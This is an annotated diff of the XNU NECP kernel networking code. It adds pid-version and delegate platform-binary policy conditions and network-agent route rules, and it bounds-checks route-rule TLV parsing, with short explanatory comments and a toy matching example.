        necp_app_id cond_real_app_id = 0;
@@ -3407,6 +3425,9 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli
                                        master_condition_negated_mask |= NECP_KERNEL_CONDITION_PID;
                                }
                                memcpy(&cond_pid, condition_value, sizeof(cond_pid));
+                               if (condition_length >= (sizeof(pid_t) + sizeof(cond_pid_version))) {
+                                       memcpy(&cond_pid_version, (condition_value + sizeof(pid_t)), sizeof(cond_pid_version));
+                               }
                                socket_only_conditions = TRUE;
                        }
                        break;
@@ -3631,6 +3652,14 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli
                        socket_only_conditions = TRUE;
                        break;
                }
+               case NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY: {
+                       master_condition_mask |= NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY;
+                       if (condition_is_negative) {
+                               master_condition_negated_mask |= NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY;
+                       }
+                       socket_only_conditions = TRUE;
+                       break;
+               }
                default: {
                        break;
                }
@@ -3817,7 +3846,7 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli
        }
 
        if (socket_layer_non_id_conditions) {
-               necp_kernel_policy_id policy_id = necp_kernel_socket_policy_add(policy->order, session->session_order, session->proc_pid, master_condition_mask, master_condition_negated_mask, cond_app_id, cond_real_app_id, cond_custom_entitlement, cond_account_id, cond_domain, cond_pid, cond_uid, cond_bound_interface, cond_traffic_class, cond_protocol, &cond_local_start, &cond_local_end, cond_local_prefix, &cond_remote_start, &cond_remote_end, cond_remote_prefix, &cond_agent_type, &cond_sdk_version, cond_client_flags, cond_signing_identifier, cond_packet_filter_tags, ultimate_result, ultimate_result_parameter);
+               necp_kernel_policy_id policy_id = necp_kernel_socket_policy_add(policy->order, session->session_order, session->proc_pid, master_condition_mask, master_condition_negated_mask, cond_app_id, cond_real_app_id, cond_custom_entitlement, cond_account_id, cond_domain, cond_pid, cond_pid_version, cond_uid, cond_bound_interface, cond_traffic_class, cond_protocol, &cond_local_start, &cond_local_end, cond_local_prefix, &cond_remote_start, &cond_remote_end, cond_remote_prefix, &cond_agent_type, &cond_sdk_version, cond_client_flags, cond_signing_identifier, cond_packet_filter_tags, ultimate_result, ultimate_result_parameter);
 
                if (policy_id == 0) {
                        NECPLOG0(LOG_DEBUG, "Error applying socket kernel policy");
@@ -3986,10 +4015,10 @@ necp_kernel_policy_get_new_id(bool socket_level)
        return newid;
 }
 
-#define NECP_KERNEL_VALID_SOCKET_CONDITIONS (NECP_KERNEL_CONDITION_APP_ID | NECP_KERNEL_CONDITION_REAL_APP_ID | NECP_KERNEL_CONDITION_DOMAIN | NECP_KERNEL_CONDITION_ACCOUNT_ID | NECP_KERNEL_CONDITION_PID | NECP_KERNEL_CONDITION_UID | NECP_KERNEL_CONDITION_ALL_INTERFACES | NECP_KERNEL_CONDITION_BOUND_INTERFACE | NECP_KERNEL_CONDITION_TRAFFIC_CLASS | NECP_KERNEL_CONDITION_PROTOCOL | NECP_KERNEL_CONDITION_LOCAL_START | NECP_KERNEL_CONDITION_LOCAL_END | NECP_KERNEL_CONDITION_LOCAL_PREFIX | NECP_KERNEL_CONDITION_REMOTE_START | NECP_KERNEL_CONDITION_REMOTE_END | NECP_KERNEL_CONDITION_REMOTE_PREFIX | NECP_KERNEL_CONDITION_ENTITLEMENT | NECP_KERNEL_CONDITION_CUSTOM_ENTITLEMENT | NECP_KERNEL_CONDITION_AGENT_TYPE | NECP_KERNEL_CONDITION_HAS_CLIENT | NECP_KERNEL_CONDITION_LOCAL_NETWORKS | NECP_KERNEL_CONDITION_CLIENT_FLAGS | NECP_KERNEL_CONDITION_LOCAL_EMPTY | NECP_KERNEL_CONDITION_REMOTE_EMPTY | NECP_KERNEL_CONDITION_PLATFORM_BINARY | NECP_KERNEL_CONDITION_SDK_VERSION | NECP_KERNEL_CONDITION_SIGNING_IDENTIFIER | NECP_KERNEL_CONDITION_PACKET_FILTER_TAGS | NECP_KERNEL_CONDITION_IS_LOOPBACK)
+#define NECP_KERNEL_VALID_SOCKET_CONDITIONS (NECP_KERNEL_CONDITION_APP_ID | NECP_KERNEL_CONDITION_REAL_APP_ID | NECP_KERNEL_CONDITION_DOMAIN | NECP_KERNEL_CONDITION_ACCOUNT_ID | NECP_KERNEL_CONDITION_PID | NECP_KERNEL_CONDITION_UID | NECP_KERNEL_CONDITION_ALL_INTERFACES | NECP_KERNEL_CONDITION_BOUND_INTERFACE | NECP_KERNEL_CONDITION_TRAFFIC_CLASS | NECP_KERNEL_CONDITION_PROTOCOL | NECP_KERNEL_CONDITION_LOCAL_START | NECP_KERNEL_CONDITION_LOCAL_END | NECP_KERNEL_CONDITION_LOCAL_PREFIX | NECP_KERNEL_CONDITION_REMOTE_START | NECP_KERNEL_CONDITION_REMOTE_END | NECP_KERNEL_CONDITION_REMOTE_PREFIX | NECP_KERNEL_CONDITION_ENTITLEMENT | NECP_KERNEL_CONDITION_CUSTOM_ENTITLEMENT | NECP_KERNEL_CONDITION_AGENT_TYPE | NECP_KERNEL_CONDITION_HAS_CLIENT | NECP_KERNEL_CONDITION_LOCAL_NETWORKS | NECP_KERNEL_CONDITION_CLIENT_FLAGS | NECP_KERNEL_CONDITION_LOCAL_EMPTY | NECP_KERNEL_CONDITION_REMOTE_EMPTY | NECP_KERNEL_CONDITION_PLATFORM_BINARY | NECP_KERNEL_CONDITION_SDK_VERSION | NECP_KERNEL_CONDITION_SIGNING_IDENTIFIER | NECP_KERNEL_CONDITION_PACKET_FILTER_TAGS | NECP_KERNEL_CONDITION_IS_LOOPBACK | NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY)
 
 static necp_kernel_policy_id
-necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *cond_domain, pid_t cond_pid, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter)
+necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *cond_domain, pid_t cond_pid, int32_t cond_pid_version, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter)
 {
        struct necp_kernel_socket_policy *new_kernel_policy = NULL;
        struct necp_kernel_socket_policy *tmp_kernel_policy = NULL;
@@ -4046,6 +4075,7 @@ necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order,
        }
        if (new_kernel_policy->condition_mask & NECP_KERNEL_CONDITION_PID) {
                new_kernel_policy->cond_pid = cond_pid;
+               new_kernel_policy->cond_pid_version = cond_pid_version;
        }
        if (new_kernel_policy->condition_mask & NECP_KERNEL_CONDITION_UID) {
                new_kernel_policy->cond_uid = cond_uid;
@@ -4562,7 +4592,7 @@ necp_kernel_socket_policy_is_unnecessary(struct necp_kernel_socket_policy *polic
                }
 
                if (compared_policy->condition_mask & NECP_KERNEL_CONDITION_PID &&
-                   compared_policy->cond_pid != policy->cond_pid) {
+                   (compared_policy->cond_pid != policy->cond_pid || compared_policy->cond_pid_version != policy->cond_pid_version)) {
                        continue;
                }
 
@@ -4970,7 +5000,7 @@ necp_lookup_route_rule_locked(struct necp_route_rule_list *list, u_int32_t route
 }
 
 static struct necp_route_rule *
-necp_lookup_route_rule_by_contents_locked(struct necp_route_rule_list *list, u_int32_t default_action, u_int8_t cellular_action, u_int8_t wifi_action, u_int8_t wired_action, u_int8_t expensive_action, u_int8_t constrained_action, u_int32_t *if_indices, u_int8_t *if_actions)
+necp_lookup_route_rule_by_contents_locked(struct necp_route_rule_list *list, u_int8_t default_action, u_int8_t cellular_action, u_int8_t wifi_action, u_int8_t wired_action, u_int8_t expensive_action, u_int8_t constrained_action, u_int32_t *if_indices, u_int8_t *if_actions, uuid_t netagent_uuid)
 {
        struct necp_route_rule *searchentry = NULL;
        struct necp_route_rule *foundentry = NULL;
@@ -5011,10 +5041,32 @@ necp_lookup_route_rule_by_contents_locked(struct necp_route_rule_list *list, u_i
                                        break;
                                }
                        }
-                       if (!match_failed && count_a == count_b) {
-                               foundentry = searchentry;
-                               break;
+
+                       if (match_failed || count_a != count_b) {
+                               continue;
+                       }
+
+                       bool has_agent_a = !uuid_is_null(netagent_uuid);
+                       bool has_agent_b = (searchentry->netagent_id != 0);
+                       if (has_agent_a != has_agent_b) {
+                               continue;
                        }
+
+                       if (has_agent_a) {
+                               struct necp_uuid_id_mapping *mapping = necp_uuid_lookup_uuid_with_service_id_locked(searchentry->netagent_id);
+                               if (mapping == NULL) {
+                                       // Bad mapping, doesn't match
+                                       continue;
+                               }
+                               if (uuid_compare(mapping->uuid, netagent_uuid) != 0) {
+                                       // UUIDs don't match
+                                       continue;
+                               }
+                       }
+
+                       // Rules match!
+                       foundentry = searchentry;
+                       break;
                }
        }
 
@@ -5027,7 +5079,7 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
        size_t offset = 0;
        u_int32_t route_rule_id = 0;
        struct necp_route_rule *existing_rule = NULL;
-       u_int32_t default_action = NECP_ROUTE_RULE_ALLOW_INTERFACE;
+       u_int8_t default_action = NECP_ROUTE_RULE_ALLOW_INTERFACE;
        u_int8_t cellular_action = NECP_ROUTE_RULE_NONE;
        u_int8_t wifi_action = NECP_ROUTE_RULE_NONE;
        u_int8_t wired_action = NECP_ROUTE_RULE_NONE;
@@ -5039,6 +5091,8 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
        u_int8_t if_actions[MAX_ROUTE_RULE_INTERFACES];
        memset(&if_actions, 0, sizeof(if_actions));
 
+       uuid_t netagent_uuid = {};
+
        LCK_RW_ASSERT(&necp_kernel_policy_lock, LCK_RW_ASSERT_EXCLUSIVE);
 
        if (route_rules_array == NULL || route_rules_array_size == 0) {
@@ -5046,12 +5100,20 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
        }
 
        // Process rules
-       while (offset < route_rules_array_size) {
+       while ((offset + sizeof(u_int8_t) + sizeof(u_int32_t)) < route_rules_array_size) {
                ifnet_t rule_interface = NULL;
                char interface_name[IFXNAMSIZ];
                u_int32_t length = 0;
                u_int8_t *value = necp_buffer_get_tlv_value(route_rules_array, offset, &length);
 
+               if (offset + sizeof(u_int8_t) + sizeof(u_int32_t) + length > route_rules_array_size) {
+                       // Invalid TLV goes beyond end of the rules array
+                       break;
+               }
+
+               // Increment offset for the next time through the loop
+               offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length;
+
                u_int8_t rule_type = necp_policy_condition_get_type_from_buffer(value, length);
                u_int8_t rule_flags = necp_policy_condition_get_flags_from_buffer(value, length);
                u_int32_t rule_length = necp_policy_condition_get_value_length_from_buffer(value, length);
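The parsing loop is hardened: every TLV is checked against the end of the rules array before its value is interpreted, and the offset is advanced up front so that none of the continue paths can skip the increment (the old code bumped the offset at the bottom of each branch). The pattern in isolation, reusing the hunk's helper names, with the per-rule handling elided:

size_t offset = 0;
while ((offset + sizeof(u_int8_t) + sizeof(u_int32_t)) < route_rules_array_size) {
        u_int32_t length = 0;
        u_int8_t *value = necp_buffer_get_tlv_value(route_rules_array, offset, &length);

        if (offset + sizeof(u_int8_t) + sizeof(u_int32_t) + length > route_rules_array_size) {
                break;  /* TLV value would run past the end of the array */
        }

        /* Advance first so every 'continue' below still makes progress. */
        offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length;

        if (value == NULL) {
                continue;
        }
        /* ... interpret this rule's type, flags and value ... */
}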
@@ -5062,6 +5124,27 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
                        continue;
                }
 
+               if (rule_type == NECP_ROUTE_RULE_USE_NETAGENT) {
+                       if (rule_length < sizeof(uuid_t)) {
+                               // Too short, skip
+                               continue;
+                       }
+
+                       if (!uuid_is_null(netagent_uuid)) {
+                               if (uuid_compare(netagent_uuid, rule_value) != 0) {
+                                       // UUIDs don't match, skip
+                                       continue;
+                               }
+                       } else {
+                               // Copy out agent UUID
+                               memcpy(netagent_uuid, rule_value, sizeof(netagent_uuid));
+                       }
+
+                       // Adjust remaining length
+                       rule_value += sizeof(netagent_uuid);
+                       rule_length -= sizeof(netagent_uuid);
+               }
+
                if (rule_length == 0) {
                        if (rule_flags & NECP_ROUTE_RULE_FLAG_CELLULAR) {
                                cellular_action = rule_type;
@@ -5081,12 +5164,10 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
                        if (rule_flags == 0) {
                                default_action = rule_type;
                        }
-                       offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length;
                        continue;
                }
 
                if (num_valid_indices >= MAX_ROUTE_RULE_INTERFACES) {
-                       offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length;
                        continue;
                }
 
@@ -5099,10 +5180,9 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
                                ifnet_release(rule_interface);
                        }
                }
-               offset += sizeof(u_int8_t) + sizeof(u_int32_t) + length;
        }
 
-       existing_rule = necp_lookup_route_rule_by_contents_locked(list, default_action, cellular_action, wifi_action, wired_action, expensive_action, constrained_action, if_indices, if_actions);
+       existing_rule = necp_lookup_route_rule_by_contents_locked(list, default_action, cellular_action, wifi_action, wired_action, expensive_action, constrained_action, if_indices, if_actions, netagent_uuid);
        if (existing_rule != NULL) {
                route_rule_id = existing_rule->id;
                os_ref_retain_locked(&existing_rule->refcount);
@@ -5112,6 +5192,9 @@ necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_
                if (new_rule != NULL) {
                        memset(new_rule, 0, sizeof(struct necp_route_rule));
                        route_rule_id = new_rule->id = necp_get_new_route_rule_id(false);
+                       if (!uuid_is_null(netagent_uuid)) {
+                               new_rule->netagent_id = necp_create_uuid_service_id_mapping(netagent_uuid);
+                       }
                        new_rule->default_action = default_action;
                        new_rule->cellular_action = cellular_action;
                        new_rule->wifi_action = wifi_action;
@@ -5163,6 +5246,7 @@ necp_remove_route_rule(struct necp_route_rule_list *list, u_int32_t route_rule_i
        if (existing_rule != NULL) {
                if (os_ref_release_locked(&existing_rule->refcount) == 0) {
                        necp_remove_aggregate_route_rule_for_id(existing_rule->id);
+                       necp_remove_uuid_service_id_mapping_with_service_id(existing_rule->netagent_id);
                        LIST_REMOVE(existing_rule, chain);
                        FREE(existing_rule, M_NECP);
                }
@@ -5491,6 +5575,28 @@ necp_remove_uuid_service_id_mapping(uuid_t uuid)
        return FALSE;
 }
 
+static bool
+necp_remove_uuid_service_id_mapping_with_service_id(u_int32_t service_id)
+{
+       struct necp_uuid_id_mapping *existing_mapping = NULL;
+
+       if (service_id == 0) {
+               return TRUE;
+       }
+
+       LCK_RW_ASSERT(&necp_kernel_policy_lock, LCK_RW_ASSERT_EXCLUSIVE);
+
+       existing_mapping = necp_uuid_lookup_uuid_with_service_id_locked(service_id);
+       if (existing_mapping != NULL) {
+               if (os_ref_release_locked(&existing_mapping->refcount) == 0) {
+                       LIST_REMOVE(existing_mapping, chain);
+                       FREE(existing_mapping, M_NECP);
+               }
+               return TRUE;
+       }
+
+       return FALSE;
+}
 
 static bool
 necp_kernel_socket_policies_update_uuid_table(void)
@@ -6142,15 +6248,11 @@ necp_check_restricted_multicast_drop(proc_t proc, struct necp_socket_info *info,
        const uint32_t sdk = proc_sdk(proc);
 
        // Enforce for iOS, linked on or after version 14
-       // If the caller set `check_minor_version`, only enforce starting at 14.TBD
+       // If the caller set `check_minor_version`, only enforce starting at 14.5
        if (platform != PLATFORM_IOS ||
            sdk == 0 ||
            (sdk >> 16) < 14 ||
-#if 0
-           (check_minor_version && (sdk >> 16) == 14 && ((sdk >> 8) & 0xff) < TBD)) {
-#else
-           (check_minor_version)) {
-#endif
+           (check_minor_version && (sdk >> 16) == 14 && ((sdk >> 8) & 0xff) < 5)) {
                return false;
        }
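The sdk value tested here appears to be the packed SDK version the process was linked against, with the major number in the upper 16 bits and the minor number in bits 8-15, as the shifts above imply. A worked example of the cutoff that replaces the old TBD placeholder:

/* Worked example: an app built against the iOS 14.5 SDK reports
 * sdk == 0x000E0500, so the minor-version exemption above no longer
 * applies and the multicast restriction is enforced. */
_Static_assert((0x000E0500 >> 16) == 14, "major version is 14");
_Static_assert(((0x000E0500 >> 8) & 0xff) == 5, "minor version is 5");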
 
@@ -6169,11 +6271,12 @@ necp_check_restricted_multicast_drop(proc_t proc, struct necp_socket_info *info,
 
 #define NECP_KERNEL_ADDRESS_TYPE_CONDITIONS (NECP_KERNEL_CONDITION_LOCAL_START | NECP_KERNEL_CONDITION_LOCAL_END | NECP_KERNEL_CONDITION_LOCAL_PREFIX | NECP_KERNEL_CONDITION_REMOTE_START | NECP_KERNEL_CONDITION_REMOTE_END | NECP_KERNEL_CONDITION_REMOTE_PREFIX | NECP_KERNEL_CONDITION_LOCAL_EMPTY | NECP_KERNEL_CONDITION_REMOTE_EMPTY | NECP_KERNEL_CONDITION_LOCAL_NETWORKS)
 static void
-necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_application_uuid, uuid_t responsible_application_uuid, char *account, char *domain, pid_t pid, uid_t uid, u_int16_t protocol, u_int32_t bound_interface_index, u_int32_t traffic_class, union necp_sockaddr_union *local_addr, union necp_sockaddr_union *remote_addr, u_int16_t local_port, u_int16_t remote_port, bool has_client, proc_t proc, proc_t responsible_proc, u_int32_t drop_order, u_int32_t client_flags, struct necp_socket_info *info, bool is_loopback)
+necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_application_uuid, uuid_t responsible_application_uuid, char *account, char *domain, pid_t pid, int32_t pid_version, uid_t uid, u_int16_t protocol, u_int32_t bound_interface_index, u_int32_t traffic_class, union necp_sockaddr_union *local_addr, union necp_sockaddr_union *remote_addr, u_int16_t local_port, u_int16_t remote_port, bool has_client, proc_t real_proc, proc_t proc, proc_t responsible_proc, u_int32_t drop_order, u_int32_t client_flags, struct necp_socket_info *info, bool is_loopback, bool is_delegated)
 {
        memset(info, 0, sizeof(struct necp_socket_info));
 
        info->pid = pid;
+       info->pid_version = pid_version;
        info->uid = uid;
        info->protocol = protocol;
        info->bound_interface_index = bound_interface_index;
@@ -6182,6 +6285,7 @@ necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_applic
        info->drop_order = drop_order;
        info->client_flags = client_flags;
        info->is_loopback = is_loopback;
+       info->is_delegated = is_delegated;
 
        if (necp_kernel_application_policies_condition_mask & NECP_KERNEL_CONDITION_APP_ID && !uuid_is_null(application_uuid)) {
                struct necp_uuid_id_mapping *existing_mapping = necp_uuid_lookup_app_id_locked(application_uuid);
@@ -6226,6 +6330,10 @@ necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_applic
                info->is_platform_binary = necp_is_platform_binary(proc) ? true : false;
        }
 
+       if (necp_kernel_application_policies_condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY && real_proc != NULL) {
+               info->real_is_platform_binary = (necp_is_platform_binary(real_proc) ? true : false);
+       }
+
        if (necp_kernel_application_policies_condition_mask & NECP_KERNEL_CONDITION_ACCOUNT_ID && account != NULL) {
                struct necp_string_id_mapping *existing_mapping = necp_lookup_string_to_id_locked(&necp_account_id_list, account);
                if (existing_mapping) {
@@ -6244,10 +6352,17 @@ necp_application_fillout_info_locked(uuid_t application_uuid, uuid_t real_applic
                        if (local_port != 0) {
                                info->local_addr.sin6.sin6_port = local_port;
                        }
-               } else if (local_port != 0) {
-                       info->local_addr.sin6.sin6_len = sizeof(struct sockaddr_in6);
-                       info->local_addr.sin6.sin6_family = AF_INET6;
-                       info->local_addr.sin6.sin6_port = local_port;
+               } else {
+                       if (remote_addr && remote_addr->sa.sa_len > 0) {
+                               info->local_addr.sa.sa_family = remote_addr->sa.sa_family;
+                               info->local_addr.sa.sa_len = remote_addr->sa.sa_len;
+                       } else {
+                               info->local_addr.sin6.sin6_family = AF_INET6;
+                               info->local_addr.sin6.sin6_len = sizeof(struct sockaddr_in6);
+                       }
+                       if (local_port != 0) {
+                               info->local_addr.sin6.sin6_port = local_port;
+                       }
                }
                if (remote_addr && remote_addr->sa.sa_len > 0) {
                        memcpy(&info->remote_addr, remote_addr, remote_addr->sa.sa_len);
@@ -6340,6 +6455,7 @@ necp_application_find_policy_match_internal(proc_t proc,
        u_int16_t local_port = 0;
        u_int16_t remote_port = 0;
        necp_drop_all_bypass_check_result_t drop_all_bypass = NECP_DROP_ALL_BYPASS_CHECK_RESULT_NONE;
+       bool is_delegated = false;
 
        if (override_local_addr) {
                memcpy(&local_addr, override_local_addr, sizeof(local_addr));
@@ -6355,6 +6471,7 @@ necp_application_find_policy_match_internal(proc_t proc,
        // Initialize UID, PID, and UUIDs to the current process
        uid_t uid = kauth_cred_getuid(proc_ucred(proc));
        pid_t pid = proc_pid(proc);
+       int32_t pid_version = proc_pidversion(proc);
        uuid_t application_uuid;
        uuid_clear(application_uuid);
        uuid_t real_application_uuid;
@@ -6443,6 +6560,7 @@ necp_application_find_policy_match_internal(proc_t proc,
 
                                                NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "euuid");
 
+                                               is_delegated = true;
                                                uuid_copy(application_uuid, value);
                                        }
                                        break;
@@ -6456,6 +6574,7 @@ necp_application_find_policy_match_internal(proc_t proc,
 
                                                NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "uuid");
 
+                                               is_delegated = true;
                                                uuid_copy(real_application_uuid, value);
                                        }
                                        break;
@@ -6469,6 +6588,7 @@ necp_application_find_policy_match_internal(proc_t proc,
 
                                                NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "pid");
 
+                                               is_delegated = true;
                                                memcpy(&pid, value, sizeof(pid_t));
                                        }
                                        break;
@@ -6482,6 +6602,7 @@ necp_application_find_policy_match_internal(proc_t proc,
 
                                                NECP_VERIFY_DELEGATION_ENTITLEMENT(proc, "uid");
 
+                                               is_delegated = true;
                                                memcpy(&uid, value, sizeof(uid_t));
                                        }
                                        break;
@@ -6623,6 +6744,7 @@ necp_application_find_policy_match_internal(proc_t proc,
                proc_t found_proc = proc_find(pid);
                if (found_proc != PROC_NULL) {
                        effective_proc = found_proc;
+                       pid_version = proc_pidversion(effective_proc);
                        release_eproc = true;
                }
        }
@@ -6640,7 +6762,7 @@ necp_application_find_policy_match_internal(proc_t proc,
 
        u_int32_t route_rule_id_array[MAX_AGGREGATE_ROUTE_RULES];
        size_t route_rule_id_array_count = 0;
-       necp_application_fillout_info_locked(application_uuid, real_application_uuid, responsible_application_uuid, account, domain, pid, uid, protocol, bound_interface_index, traffic_class, &local_addr, &remote_addr, local_port, remote_port, has_client, effective_proc, responsible_proc, drop_order, client_flags, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK));
+       necp_application_fillout_info_locked(application_uuid, real_application_uuid, responsible_application_uuid, account, domain, pid, pid_version, uid, protocol, bound_interface_index, traffic_class, &local_addr, &remote_addr, local_port, remote_port, has_client, proc, effective_proc, responsible_proc, drop_order, client_flags, &info, (bypass_type == NECP_BYPASS_TYPE_LOOPBACK), is_delegated);
        matched_policy = necp_socket_find_policy_match_with_info_locked(necp_kernel_socket_policies_app_layer_map, &info, &filter_control_unit, route_rule_id_array, &route_rule_id_array_count, MAX_AGGREGATE_ROUTE_RULES, &service_action, &service, netagent_ids, netagent_use_flags, NECP_MAX_NETAGENTS, required_agent_types, num_required_agent_types, info.used_responsible_pid ? responsible_proc : effective_proc, 0, NULL, NULL, &drop_dest_policy_result, &drop_all_bypass, &flow_divert_aggregate_unit);
 
        // Check for loopback exception again after the policy match
@@ -7035,7 +7157,7 @@ necp_application_find_policy_match_internal(proc_t proc,
                                if (v6Route->rt_ifp != NULL) {
                                        *flags |= NECP_CLIENT_RESULT_FLAG_HAS_IPV6;
 
-                                       if (ifnet_get_nat64prefix(v6Route->rt_ifp, NULL) == 0) {
+                                       if (ifnet_get_nat64prefix(v6Route->rt_ifp, returned_result->nat64_prefixes) == 0) {
                                                *flags |= NECP_CLIENT_RESULT_FLAG_HAS_NAT64;
                                        }
                                }
@@ -7071,6 +7193,22 @@ necp_application_find_policy_match_internal(proc_t proc,
                        // If the route gets denied, stop matching rules
                        break;
                }
+
+               // Check if there is a route rule that adds an agent
+               u_int32_t netagent_id = necp_route_get_netagent(rt, route_rule_id_array[route_rule_index]);
+               if (netagent_id != 0) {
+                       struct necp_uuid_id_mapping *mapping = necp_uuid_lookup_uuid_with_service_id_locked(netagent_id);
+                       if (mapping != NULL) {
+                               for (netagent_cursor = 0; netagent_cursor < NECP_MAX_NETAGENTS; netagent_cursor++) {
+                                       if (uuid_is_null(returned_result->netagents[netagent_cursor])) {
+                                               // Found open slot
+                                               uuid_copy(returned_result->netagents[netagent_cursor], mapping->uuid);
+                                               returned_result->netagent_use_flags[netagent_cursor] = 0;
+                                               break;
+                                       }
+                               }
+                       }
+               }
        }
 
        if (rt != NULL && rt->rt_ifp != NULL) {
@@ -7169,7 +7307,7 @@ done:
 }
 
 static bool
-necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_app_id app_id, necp_app_id real_app_id, errno_t cred_result, u_int32_t account_id, struct substring domain, u_int8_t domain_dot_count, pid_t pid, uid_t uid, u_int32_t bound_interface_index, u_int32_t traffic_class, u_int16_t protocol, union necp_sockaddr_union *local, union necp_sockaddr_union *remote, struct necp_client_parameter_netagent_type *required_agent_types, u_int32_t num_required_agent_types, bool has_client, uint32_t client_flags, int is_platform_binary, proc_t proc, u_int16_t pf_tag, struct rtentry *rt, bool is_loopback)
+necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_app_id app_id, necp_app_id real_app_id, errno_t cred_result, u_int32_t account_id, struct substring domain, u_int8_t domain_dot_count, pid_t pid, int32_t pid_version, uid_t uid, u_int32_t bound_interface_index, u_int32_t traffic_class, u_int16_t protocol, union necp_sockaddr_union *local, union necp_sockaddr_union *remote, struct necp_client_parameter_netagent_type *required_agent_types, u_int32_t num_required_agent_types, bool has_client, uint32_t client_flags, int is_platform_binary, proc_t proc, u_int16_t pf_tag, struct rtentry *rt, bool is_loopback, bool real_is_platform_binary, bool is_delegated)
 {
        if (!(kernel_policy->condition_mask & NECP_KERNEL_CONDITION_ALL_INTERFACES)) {
                if (kernel_policy->condition_mask & NECP_KERNEL_CONDITION_BOUND_INTERFACE) {
@@ -7352,11 +7490,17 @@ necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_a
                                // No match, matches forbidden pid
                                return FALSE;
                        }
+                       if (kernel_policy->cond_pid_version != 0 && pid_version == kernel_policy->cond_pid_version) {
+                               return FALSE;
+                       }
                } else {
                        if (pid != kernel_policy->cond_pid) {
                                // No match, does not match required pid
                                return FALSE;
                        }
+                       if (kernel_policy->cond_pid_version != 0 && pid_version != kernel_policy->cond_pid_version) {
+                               return FALSE;
+                       }
                }
        }
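
A simplified, standalone sketch of the (pid, pid_version) matching added above, covering only the non-negated case: a cond_pid_version of 0 matches any incarnation of the pid, while a non-zero value pins the condition to one specific incarnation. The numbers are made up.

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

struct toy_pid_cond {
	int32_t cond_pid;
	int32_t cond_pid_version;   /* 0 == any incarnation of the pid */
};

static bool
toy_pid_condition_matches(const struct toy_pid_cond *cond,
    int32_t pid, int32_t pid_version)
{
	if (pid != cond->cond_pid) {
		return false;               /* wrong pid */
	}
	if (cond->cond_pid_version != 0 &&
	    pid_version != cond->cond_pid_version) {
		return false;               /* pid matches, incarnation does not */
	}
	return true;
}

int
main(void)
{
	struct toy_pid_cond cond = { .cond_pid = 500, .cond_pid_version = 3 };

	printf("%d\n", toy_pid_condition_matches(&cond, 500, 3)); /* 1 */
	printf("%d\n", toy_pid_condition_matches(&cond, 500, 7)); /* 0 */
	return 0;
}
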
 
@@ -7560,6 +7704,18 @@ necp_socket_check_policy(struct necp_kernel_socket_policy *kernel_policy, necp_a
                }
        }
 
+       if (is_delegated && (kernel_policy->condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY)) {
+               if (kernel_policy->condition_negated_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) {
+                       if (real_is_platform_binary) {
+                               return FALSE;
+                       }
+               } else {
+                       if (!real_is_platform_binary) {
+                               return FALSE;
+                       }
+               }
+       }
+
        return TRUE;
 }
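
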